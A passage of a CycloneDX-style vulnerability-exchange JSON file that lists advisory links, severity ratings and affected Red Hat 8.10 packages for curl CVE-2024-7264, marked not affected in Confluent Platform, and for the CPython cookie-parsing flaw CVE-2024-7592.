          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318870"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318873"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318874"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318876"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318882"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318883"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318884"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318886"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318900"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318905"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318914"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318922"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318923"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318925"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318926"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318927"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2331191"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339218"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339221"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339226"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339231"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339236"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339238"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339252"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339259"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339266"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339270"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339271"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339275"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339277"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339281"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339284"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339291"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339293"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339295"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339299"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339300"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339304"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339305"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-7264.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-7264.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11053"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21193"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21194"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21196"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21197"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21198"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21201"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21203"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21212"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21213"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21218"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21219"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21230"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21231"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21236"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21237"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21238"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21239"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21241"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21247"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37371"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5535"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7264"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21490"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21491"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21494"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21497"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21500"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21501"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21503"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21504"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21505"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21518"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21520"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21521"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21522"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21523"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21525"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21529"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21531"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21534"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21536"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21540"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21543"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21546"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21555"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21559"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-1671.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:1671"
        },
        {
          "url": "https://github.com/curl/curl/commit/27959ecce75cdb2809c0bdb3286e60e08fadb519"
        },
        {
          "url": "https://hackerone.com/reports/2629968"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-7264.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-1673.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7264"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240828-0008/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20241025-0006/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20241025-0010/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6944-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6944-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-7264"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpuoct2024.html#AppendixMSQL"
        }
      ],
      "published": "2024-07-31T08:15:02+00:00",
      "updated": "2026-06-17T08:19:43+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-7592",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        400,
        1333
      ],
      "description": "There is a LOW severity vulnerability affecting CPython, specifically the\n'http.cookies' standard library module.\n\n\nWhen parsing cookies that contained backslashes for quoted characters in\nthe cookie value, the parser would use an algorithm with quadratic\ncomplexity, resulting in excess CPU resources being used while parsing the\nvalue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-7592"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:3634"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-7592"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305879"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7592"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-3634.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:3634"
        },
        {
          "url": "https://github.com/python/cpython/commit/391e5626e3ee5af267b97e37abc7475732e67621"
        },
        {
          "url": "https://github.com/python/cpython/commit/44e458357fca05ca0ae2658d62c8c595b048b5ef"
        },
        {
          "url": "https://github.com/python/cpython/commit/a77ab24427a18bff817025adb03ca920dc3f1a06"
        },
        {
          "url": "https://github.com/python/cpython/commit/b2f11ca7667e4d57c71c1c88b255115f16042d9a"
        },
        {
          "url": "https://github.com/python/cpython/commit/d4ac921a4b081f7f996a5d2b101684b67ba0ed7f"
        },
        {
          "url": "https://github.com/python/cpython/commit/d662e2db2605515a767f88ad48096b8ac623c774"
        },
        {
          "url": "https://github.com/python/cpython/commit/dcc3eaef98cd94d6cb6cb0f44bd1c903d04f33b1"
        },
        {
          "url": "https://github.com/python/cpython/issues/123067"
        },
        {
          "url": "https://github.com/python/cpython/pull/123075"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-7592.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-3634.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00000.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/HXJAAAALNUNGCQUS2W7WR6GFIZIHFOOK/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7592"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20241018-0006/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7015-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7015-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-7592"
        }
      ],
      "published": "2024-08-19T19:15:08+00:00",
      "updated": "2026-06-17T08:20:30+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
